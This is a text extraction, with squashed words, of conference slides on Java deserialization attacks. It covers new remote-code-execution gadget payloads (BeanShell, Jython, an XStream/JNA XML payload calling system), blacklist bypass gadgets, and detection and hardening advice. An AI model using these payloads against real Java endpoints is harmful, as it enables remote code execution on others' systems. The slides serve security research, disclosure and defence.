![Page 1: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/1.jpg)
SESSION ID:
SerialKiller:SilentlyPwningYourJavaEndpoints
ASD-F03
Chris;anSchneiderWhitehatHacker&DeveloperFreelancer@cschneider4711
AlvaroMuñozPrincipalSecurityResearcherHPESecurityFor@fy@pwntester
![Page 2: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/2.jpg)
Whythistalk?
Javadeserializa@onaEackshavebeenknownforyearsRela@velynewgadgetinApacheCommons-Collec/onsmadethetopicalsoavailabletomainstream(dev)audiencein2015
Someinaccurateadvicetoprotectyourapplica@onsismakingtheroundsInthistalkwe’lldemonstratetheweaknessofthisadviceby…
…showingyounewRCEgadgets…showingyoubypasses
We’llgiveadvicehowtospotthisvulnerabilityanditsgadgetsduring……codereviews(i.e.showingyouwhattolookfor)…pentests(i.e.howtogenericallytestforsuchissues)
2
![Page 3: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/3.jpg)
WhatisJavaSerializa;onagain?
Takingasnapshotofanobjectgraphasabytestreamthatcanbeusedtoreconstructtheobjectgraphtoitsoriginalstate
Onlyobjectdataisserialized,notthecodeThecodesitsontheClassPathofthedeserializingend
Developerscancustomizethisserializa@on/deserializa@onprocessIndividualobject/[email protected]()/.writeReplace()/.writeExternal()methodsIndividualobject/[email protected]()/.readResolve()/.readExternal()methods(andmore)
3
![Page 4: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/4.jpg)
AMackSurface
UsagesofJavaserializa@oninprotocols/formats/products:RMI(RemoteMethodInvoca@on)JMX(JavaManagementExtension)JMS(JavaMessagingSystem)SpringServiceInvokers
HTTP,JMS,RMI,etc.
…
4
AndroidAMF(Ac@onMessageFormat)JSFViewStateWebLogicT3…
![Page 5: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/5.jpg)
StandingontheShoulderofGiants…
5
SpringAOP(byWouterCoekaerts,publicexploit:@pwntesterin2011)
AMFDoS(byWouterCoekaertsin2011)
Commons-fileupload(byArunBabuNeelicaEuin2013)
Groovy(bycpnrodzc7/@frohoffin2015)
Commons-Collec;ons(by@frohoffand@geblin2015)
SpringBeans(by@frohoffand@geblin2015)
SerialDoS(byWouterCoekaertsin2015)
SpringTx(by@zerothinkingin2016)
JDK7(by@frohoffin2016)
Probablymoreweareforge7ngandmoretocomeinfewminutes…
![Page 6: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/6.jpg)
Serializable Class
JavaDeserializa;oninaNutshell
6
6. Restore object member fields• readObject(ObjectInputStream) • readObjectNoData()
7. Eventually replace restored object• readResolve()
8. Optionally validate object• validateObject()
9. Cast deserialized object to expected type10.Use deserialized object
ObjectInputStream Application Code Garbage Collector
11.Call finalize() on GC
1. Get bytes2. Initialize ObjectInputStream3. Read object from stream
• ois.readObject()4. Resolve classes of stream resolveClass()
5. Deserialize objects
![Page 7: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/7.jpg)
TriggeringExecu;onvia"MagicMethods"
7
Serializable Class
6. Restore object member fields• readObject(ObjectInputStream) • readObjectNoData()
7. Eventually replace restored object• readResolve()
8. Optionally validate object• validateObject()
9. Cast deserialized object to expected type10.Use deserialized object
ObjectInputStream Application Code Garbage Collector
11.Call finalize() on GC
1. Get bytes2. Initialize ObjectInputStream3. Read object from stream
• ois.readObject()4. Resolve classes of stream resolveClass()
5. Deserialize objects
![Page 8: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/8.jpg)
Exploi;ng"MagicMethods"
Abusing"magicmethods"ofgadgetswhichhavedangerouscode:AEackercontrolsmemberfields’[email protected]()/.readResolve()isinvoked
Implementa@onofthismethodingadgetclassusesaMacker-controlledfields
Asidefromtheclassiconesalsolesser-known"magicmethods"help:.validateObject()aspartofvalida@on(whichdoesnotpreventaEacks).readObjectNoData()[email protected]()aspartofGC(evenajererrors)
withdeferredexecu@onbypassingad-hocSecurityManagersatdeserializa@on
WorksalsoforExternalizable’s.readExternal()
8
![Page 9: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/9.jpg)
Exploi;ng"MagicMethods"
Butwhatifthereareno "MagicMethods"onthetarget’s
ClassPaththathave"dangerouscode"fortheaEackertoinfluence?
9
![Page 10: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/10.jpg)
ProxywithInvoca;onHandlerasCatalyzer
10
Class
field1 field2
… method1 method2
Interface
method1 method2
Invocation Handler
Custom code
method2
Proxy
![Page 11: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/11.jpg)
AEackerstepsuponserializa@on:AEackercontrolsmemberfieldsofIHgadget,whichhasdangerouscodeIH(aspartofDynamicProxy)getsserializedbyaEackerasfieldonwhichaninnocuousmethodiscalledfrom"magicmethod"(ofclasstodeserialize)
Applica@onstepsupondeserializa@on:"MagicMethod"of"TriggerGadget"callsinnocuousmethodonanaMackercontrolledfieldThiscallisinterceptedbyproxy(setbyaEackerasthisfield)anddispatchedtoIH
OtherIH-liketypesexistasidefromjava.lang.reflect.Invoca@onHandlerjavassist.u@l.proxy.MethodHandlerorg.jboss.weld.bean.proxy.MethodHandler
Exploi;ngInvoca;onHandler(IH)Gadgets
11
![Page 12: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/12.jpg)
NewRCEGadgetinBeanShell(CVE-2016-2510)
bsh.XThis$HandlerSerializableInvoca@onHandlerUponfunc@onintercep@oncustomBeanShellcodewillbecalledAlmostanyJavacodecanbeincludedinthepayloadInordertoinvokethepayloadatriggergadgetisneeded
12
![Page 13: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/13.jpg)
NewRCEGadgetinBeanShell(CVE-2016-2510)
13
1 String payload = "compare(Object foo, Object bar) {" + 2 " new java.lang.ProcessBuilder(new String[]{\"calc.exe\"}).start();return 1;" + 3 "}"; 4 5 // Create Interpreter 6 Interpreter i = new Interpreter(); 7 i.eval(payload); 8 9 // Create Proxy/InvocationHandler 10 XThis xt = new XThis(i.getNameSpace(), i); 11 InvocationHandler handler = (InvocationHandler) getField(xt.getClass(), "invocationHandler").get(xt); 12 Comparator comparator = (Comparator) Proxy.newProxyInstance(classLoader, new Class<?>[]{Comparator.class}, handler); 13 14 // Prepare Trigger Gadget (will call Comparator.compare() during deserialization) 15 final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator); 16 Object[] queue = new Object[] {1,1}; 17 setFieldValue(priorityQueue, "queue", queue); 18 setFieldValue(priorityQueue, "size", 2);
![Page 14: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/14.jpg)
NewRCEGadgetinJython(CVEpending)
org.python.core.PyFunctionSerializableInvoca@onHandlerUponfunc@onintercep@oncustompythonbytecodewillbecalledOnlypythonbuilt-infunc@onscanbecalled
Impor@ngmodulesisnotpossible:noos.system()sorry:(S@llwecanreadandwritearbitraryfiles(cancauseRCEinwebapp)
Inordertoinvokethepayloadatriggergadgetisneeded
14
![Page 15: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/15.jpg)
NewRCEGadgetinJython(CVEpending)
15
1 // Python bytecode to write a file on disk 2 String code = 3 "740000" + // 0 LOAD_GLOBAL 0 (open) 4 "640100" + // 3 LOAD_CONST 1 (<PATH>) 5 "640200" + // 6 LOAD_CONST 2 ('w') 6 "830200" + // 9 CALL_FUNCTION 2 7 "690100" + // 12 LOAD_ATTR 1 (write) 8 "640300" + // 15 LOAD_CONST 3 (<CONTENT>) 9 "830100" + // 18 CALL_FUNCTION 1 10 "01" + // 21 POP_TOP 11 "640000" + // 22 LOAD_CONST 12 "53"; // 25 RETURN_VALUE 13 14 // Helping cons and names 15 PyObject[] consts = new PyObject[]{new PyString(""), new PyString(path), new PyString("w"), new PyString(content)}; 16 String[] names = new String[]{"open", “write"}; 17 18 PyBytecode codeobj = new PyBytecode(2, 2, 10, 64, "", consts, names, new String[]{}, "noname", "<module>", 0, ""); 19 setFieldValue(codeobj, "co_code", new BigInteger(code, 16).toByteArray()); 20 PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj);
![Page 16: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/16.jpg)
NewRCEGadgets
MoreofourreportedRCEgadgetss;llbeingfixed
Staytuned!TwiEer:@pwntester&@cschneider4711Blog:hEps://hp.com/go/hpsrblog
16
ZDI ID Affected Vendor(s) Severity (CVSS)
ZDI-CAN-3511 Oracle 7.5
ZDI-CAN-3510 Oracle 7.5
ZDI-CAN-3497 Oracle 7.5
ZDI-CAN-3588 Oracle 7.5
ZDI-CAN-3592 Oracle 7.5
![Page 17: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/17.jpg)
DemoofaMack
17
Let’s take a look at the live demo…
![Page 18: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/18.jpg)
Exis;ngMi;ga;onAdvice
18
SimplyremovegadgetclassesfromClassPath(FoxGlove’sadvice)
Blacklist&WhitelistbasedcheckatObjectInputStream.resolveClassDifferentimplementa@onsofthis"Lookahead"-Deserializa@onexist:
UseofObjectInputStreamsubclassinapplica@on’sdeserializa@oncodeAgent-based(AOP-like)hookingofcallstoObjectInputStream.resolveClass()
AdhocSecurityManagersandboxesduringdeserializa@on
![Page 19: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/19.jpg)
Exis;ngMi;ga;onAdvice
19
SimplyremovegadgetclassesfromClassPath(FoxGlove’sadvice)Notfeasiblegivenmoreandmoregadgetsbecomingavailable
Blacklist&WhitelistbasedcheckatObjectInputStream.resolveClassDifferentimplementa@onsofthis"Lookahead"-Deserializa@onexist:
UseofObjectInputStreamsubclassinapplica@on’sdeserializa@oncodeAgent-based(AOP-like)hookingofcallstoObjectInputStream.resolveClass()
AdhocSecurityManagersandboxesduringdeserializa@on
![Page 20: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/20.jpg)
Exis;ngMi;ga;onAdvice
20
SimplyremovegadgetclassesfromClassPath(FoxGlove’sadvice)Notfeasiblegivenmoreandmoregadgetsbecomingavailable
Blacklist&WhitelistbasedcheckatObjectInputStream.resolveClassDifferentimplementa@onsofthis"Lookahead"-Deserializa@onexist:
UseofObjectInputStreamsubclassinapplica@on’sdeserializa@oncodeAgent-based(AOP-like)hookingofcallstoObjectInputStream.resolveClass()
Blacklists:Bypassesmightexist(inyourdependenciesoryourowncode)Whitelists:Difficulttogetright&DoSthoughJDKstandardclassespossible
AdhocSecurityManagersandboxesduringdeserializa@on
![Page 21: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/21.jpg)
Exis;ngMi;ga;onAdvice
21
SimplyremovegadgetclassesfromClassPath(FoxGlove’sadvice)Notfeasiblegivenmoreandmoregadgetsbecomingavailable
Blacklist&WhitelistbasedcheckatObjectInputStream.resolveClassDifferentimplementa@onsofthis"Lookahead"-Deserializa@onexist:
UseofObjectInputStreamsubclassinapplica@on’sdeserializa@oncodeAgent-based(AOP-like)hookingofcallstoObjectInputStream.resolveClass()
Blacklists:Bypassesmightexist(inyourdependenciesoryourowncode)Whitelists:Difficulttogetright&DoSthoughJDKstandardclassespossible
AdhocSecurityManagersandboxesduringdeserializa@onExecu@oncanbedeferreda]erdeserializa@on:we’llshowlaterhow…
![Page 22: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/22.jpg)
Howdidvendorshandlethisrecently?
Vendor / Product Type of Protection
Atlassian Bamboo Removed Usage of Serialization
Apache ActiveMQ LAOIS Whitelist
Apache Batchee LAOIS Blacklist + optional Whitelist
Apache JCS LAOIS Blacklist + optional Whitelist
Apache openjpa LAOIS Blacklist + optional Whitelist
Apache Owb LAOIS Blacklist + optional Whitelist
Apache TomEE LAOIS Blacklist + optional Whitelist
********** (still to be fixed) LAOIS Blacklist
22
![Page 23: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/23.jpg)
BypassingLookAheadBlacklists
Newgadgettypetobypassad-hoclook-aheadObjectInputStreamblacklistprotec@ons:
Canwefindaclasslike:
Duringdeserializa@onoftheobjectgraph,anewimmaculateunprotectedObjectInputStreamwillbeinstan@ated
AEackercanprovideanyarbitrarybytesforunsafedeserializa@on
BypassdoesnotworkforcaseswhereObjectInputStreamisinstrumented
23
1 public class NestedProblems implements Serializable {2 byte[] bytes … ;3 …4 private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {5 ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));6 ois.readObject();7 }8 }
![Page 24: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/24.jpg)
Isthisforrealoristhisjustfantasy?
Applica@onServers:IBMWebSphere:13OracleWebLogic:3ApacheTomEE:3…
24
Currentlywefoundmanybypassgadgets:JRE:3ThirdPartyLibraries:
Apachelibraries:6Springlibraries:1Otherpopularlibraries:2
![Page 25: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/25.jpg)
Example(hasbeenfixed)
org.apache.commons.scxml2.env.groovy.GroovyContext
25
1 @SuppressWarnings("unchecked") 2 private void readObject(ObjectInputStream in) throws IOException,ClassNotFoundException { 3 this.scriptBaseClass = (String)in.readObject(); 4 this.evaluator = (GroovyEvaluator)in.readObject(); 5 this.binding = (GroovyContextBinding)in.readObject(); 6 byte[] bytes = (byte[])in.readObject(); 7 if (evaluator != null) { 8 this.vars = (Map<String, Object>) 9 new ObjectInputStream(new ByteArrayInputStream(bytes)) { 10 protected Class resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException { 11 return Class.forName(osc.getName(), true, evaluator.getGroovyClassLoader()); 12 } 13 }.readObject(); 14 } 15 else { 16 this.vars = (Map<String, Object>)new ObjectInputStream(new ByteArrayInputStream(bytes)).readObject(); 17 } 18 }
![Page 26: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/26.jpg)
Nowwithhomedelivery
javax.media.jai.remote.SerializableRenderedImagefinalize() > dispose() > closeClient()
Bypassesad-hocSecurityManagers
26
1 private void closeClient() { 2 3 // Connect to the data server. 4 Socket socket = connectToServer(); 5 6 // Get the socket output stream and wrap an object 7 // output stream around it. 8 OutputStream out = null; 9 ObjectOutputStream objectOut = null; 10 ObjectInputStream objectIn = null; 11 try { 12 out = socket.getOutputStream(); 13 objectOut = new ObjectOutputStream(out); 14 objectIn = new ObjectInputStream(socket.getInputStream()); 15 } catch (IOException e) { ... } 16 ...
18 try { 19 objectIn.readObject(); 20 } catch (IOException e) { 21 sendExceptionToListener(JaiI18N.getString( 22 "SerializableRenderedImage8"), 23 new ImagingException(JaiI18N.getString( 24 "SerializableRenderedImage8"), e)); 25 } catch (ClassNotFoundException cnfe) { 26 sendExceptionToListener(JaiI18N.getString( 27 "SerializableRenderedImage9"), 28 new ImagingException(JaiI18N.getString( 29 "SerializableRenderedImage9"), cnfe)); 30 } 31 ... 32 }
![Page 27: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/27.jpg)
Demoofbypass
27
Let’s take a look at the live demo…
![Page 28: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/28.jpg)
IsitjustJavaSerializa;on?
XStreamislikeJavaSerializa@ononsteroidsCandeserializenon-serializableclasses:—>manymoregadgetsavailable
Reportedbackin2013:CVE-2013-7285byAlvaroMunoz(@pwntester)&AbrahamKang(@KangAbraham)XStreamimplementedablacklist/whitelistprotec@onscheme(bydefaultonlyblockingjava.beans.EventHandler)
Unfortunatelydevsarenotfullyawareands@lluseunprotectedoronlyblacklistedXStreaminstancese.g.:CVE-2015-5254inApacheAc;veMQandCVE-2015-5344inApacheCamel
bothby@pwntester,@cschneider4711,@maEhias_kaiser
WefoundmanynewgadgetsduringresearchCan’tbefixedbymakingthemnon-serializable.OnlyfixisapplyingawhitelisttoXStreaminstance.
…plusmostoftheonesavailableforJavaserializa@on(e.g.:Commons-Collec@ons,Spring,…)
28
![Page 29: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/29.jpg)
Exploi;ngJNA
29
1 <sorted-set> 2 <string>calc.exe</string> 3 <dynamic-proxy> 4 <interface>java.lang.Comparable</interface> 5 <handler class="com.sun.jna.CallbackReference$NativeFunctionHandler"> 6 <options /> 7 <function class="com.sun.jna.Function"> 8 <peer>140735672090131</peer> <!-- depends on target --> 9 <library> 10 <libraryName>c</libraryName> 11 <libraryPath>libc.dylib</libraryPath> 12 </library> 13 <functionName>system</functionName> 14 </function> 15 </handler> 16 </dynamic-proxy> 17 </sorted-set>
![Page 30: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/30.jpg)
XStream,canyourunreadObject()?
XStreamworkswithJavaserializa@onsothatifaclasscontainsareadObject()orreadResolve()method,itwillcallthemaspartofthedeserializa@on.
XStreamturnsanyXStreamdeserializa@onendpointintoastandardJavaone
CanwebypassXStreampermissionsystembyrunningcodeinreadObject(),readResolve(),finalize(),…?
AnyLookAheadbypassgadgetwillalsobevalidtobypassXStreamblacklist
30
![Page 31: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/31.jpg)
#RSAC
FindingVulnerabili;es&GadgetsintheCode
SASTTips
![Page 32: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/32.jpg)
WhoShouldCheckforWhat?
Checkyourendpointsforthoseaccep;ng(untrusted)serializeddata
Checkyourcodeforpoten;algadgets,whichcouldbeusedindeserializa@onaEackswhereyourlibrary/frameworkisused
AlsotheClassPathoftheapp-servercanhostexploitablegadgets
Problem:"GadgetSpace"istoobigTypicalapp-serverbaseddeploymentshavehundredsofJARsinClassPath
SASTtoolsmighthelpforbothchecks…SuchasHPESecurityFor@fyortheOpenSourceFindSecBugs
32
![Page 33: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/33.jpg)
FindingDirectDeserializa;onEndpoints
Findcalls(withinyourcodeandyourdependencies’code)to:ObjectInputStream.readObject()ObjectInputStream.readUnshared()
WhereInputStreamisaEackercontrolled.Forexample:
…andObjectInputStreamisorextendsjava.io.ObjectInputStream…butisnotasafeone(eg:Commons-ioValida@ngObjectInputStream)
33
1 InputStream is = request.getInputStream(); 2 ObjectInputStream ois = new ObjectInputStream(is); 3 ois.readObject();
![Page 34: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/34.jpg)
High-LevelGadgetCategories
34
Gadgetisaclass(withintarget’sClassPath)useableupondeserializa@ontofacilitateanaEack,whichojenconsistsofmul@plegadgetschainedtogetherasa"GadgetChain".
TriggerGadgetisaclasswitha"MagicMethod"triggeredduringdeserializa@onac@nguponproxy-ablefields,whichareaEackercontrolled(serializable).TriggerGadgetsini@atetheexecu@on.
BypassGadgetisaclasswith(preferably)a"MagicMethod"triggeredduringdeserializa@onwhichleadstoa"NestedDeserializa@on"withanunprotectedOISofaEacker-controllablebytes.
HelperGadgetisaclasswithgluestogetherotherbondsofagadgetchain.
AbuseGadgetisaclasswithamethodimplemen@ngdangerousfunc@onality,aEackerswanttoexecute.
NeedforserializabilityislijedwhentechniqueslikeXStreamareusedbythetarget.
![Page 35: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/35.jpg)
FindingGadgetsforFun&Profit
35
Lookforinteres;ngmethodcalls…java.lang.reflect.Method.invoke()java.io.File()java.io.ObjectInputStream()java.net.URLClassLoader()java.net.Socket()java.net.URL()javax.naming.Context.lookup()…
reachedby:java.io.Externalizable.readExternal()java.io.Serializable.readObject()java.io.Serializable.readObjectNoData()java.io.Serializable.readResolve()[email protected]()[email protected]()[email protected]()org.jboss.weld.bean.proxy.MethodHandler.invoke()java.lang.Object.finalize()<clinit>(sta/cini/alizer)
Sinks Sources
![Page 36: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/36.jpg)
#RSAC
WhattoCheckDuringPentests?
DASTTips
![Page 37: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/37.jpg)
PassiveDeserializa;onEndpointDetec;on
37
Requests(oranynetworktraffic)carryingserializedJavaobjects:Easytospotduetomagicbytesatthebeginning:0xAC 0xED …Someweb-appsmightuseBase64tostoreserializeddatainCookies,etc.:rO0 …Beawarethatcompressioncould’vebeenappliedbeforeBase64
SeveralBurp-Pluginshavebeencreatedrecentlytopassivelyscan forJavaserializa@ondataaspartofwebtrafficanalysis
Alsotestfornon-webrelated(binary)trafficwithnetworkprotocolanalyzers
![Page 38: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/38.jpg)
Ac;veVulnerabilityScanning
38
SomeBurp-Pluginsac;velytrytoexploitsubsetofexis@nggadgetsEitherblindthroughOOBcommunica@on("superserial-ac@ve")
Forapplica@onsrunningonJBoss
Or@me-basedblindviadelay("JavaDeserializa@onScanner")ForgadgetsinApacheCommonsCollec@ons3&4AndgadgetsinSpring4
Recommenda@on:Adjustac@vescanningpayloadstonotrelyonspecificgadgets-beEeruseagenericdelayintroduc@on
Suchas"SerialDoS"(byWouterCoekaerts),whichisonlyHashSetbasedas of January 2015
![Page 39: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/39.jpg)
#RSAC
HardeningAdvice
![Page 40: Principal Security Researcher HPE Security For@fy Serial ... · Standing on the Shoulder of Giants… 5 Spring AOP (by Wouter Coekaerts, public exploit: @pwntester in 2011) AMF DoS](https://reader033.vdocuments.site/reader033/viewer/2022043000/5f77219a8291fd450a00253f/html5/thumbnails/40.jpg)
HowtoHardenYourApplica;ons?
DONOTDESERIALIZEUNTRUSTEDDATA!!
Whenarchitecturepermitsit:Useotherformatsinsteadofserializedobjects:JSON,XML,etc.
ButbeawareofXML-baseddeserializa@onaEacksviaXStream,XmlDecoder,etc.
Assecond-bestop@on:Usedefensivedeserializa@onwithlook-aheadOISwithastrictwhitelist
